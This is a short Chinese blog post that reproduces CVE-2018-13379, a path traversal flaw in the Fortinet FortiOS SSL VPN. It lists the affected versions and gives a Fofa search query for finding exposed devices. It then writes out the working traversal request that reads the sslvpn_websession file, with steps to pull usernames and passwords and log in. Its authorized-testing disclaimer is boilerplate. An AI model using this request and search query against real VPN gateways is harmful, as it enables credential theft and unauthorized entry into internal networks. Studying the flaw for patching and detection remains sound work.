Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

小胡yhu2023-11-10 22:13

Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。

漏洞影响

Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

漏洞危害

获取敏感信息,造成数据泄露,并且可获取账户密码直通内网

网络测绘

Fofa: body="FortiToken clock drift detected"

漏洞复现

1. 访问链接查看是否存在漏洞

bash 复制代码 
/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

2. 查看用户名密码

3. 登录后台

相关推荐
毕设源码-赖学姐3 小时前
【开题答辩全过程】以 高校学科竞赛管理系统安全开发为例,包含答辩的问题和答案
安全
麦聪聊数据3 小时前
智慧医疗数据互联互通:使用 QuickAPI 构建实时诊疗数据交换层
数据库·sql·安全
Cisco_hw_zte5 小时前
小型网络中部署Aruba无线
网络
啥都想学点6 小时前
kali基础介绍(Reconnaissance侦察)
安全
枫眠QAQ8 小时前
hackthebox Cicada靶机
安全·web安全·网络安全
学习中的DGR8 小时前
[极客大挑战 2019]Http 1 新手解题过程
网络·python·网络协议·安全·http
乐迪信息8 小时前
乐迪信息:AI防爆摄像机在船舶监控的应用
大数据·网络·人工智能·算法·无人机
啥都想学点8 小时前
kali 基础介绍(CredentialAccess——凭证访问)
安全·网络安全
天天睡大觉8 小时前
Python学习12
网络·python·学习
i建模8 小时前
如何设置宿主的windows11系统访问HyperV的虚拟机,同时该虚拟机可以上网
网络
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Clawdbot 中文汉化版 接入微信、飞书04一种新的LCA算法05【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)06Claude Code Skills 实用使用手册07在Trae中使用Pencil MCP08零门槛部署本地 AI 助手:Clawdbot/Meltbot 部署深度保姆级教程09UV安装并设置国内源10struts2 XML外部实体注入漏洞复现(CVE-2025-68493)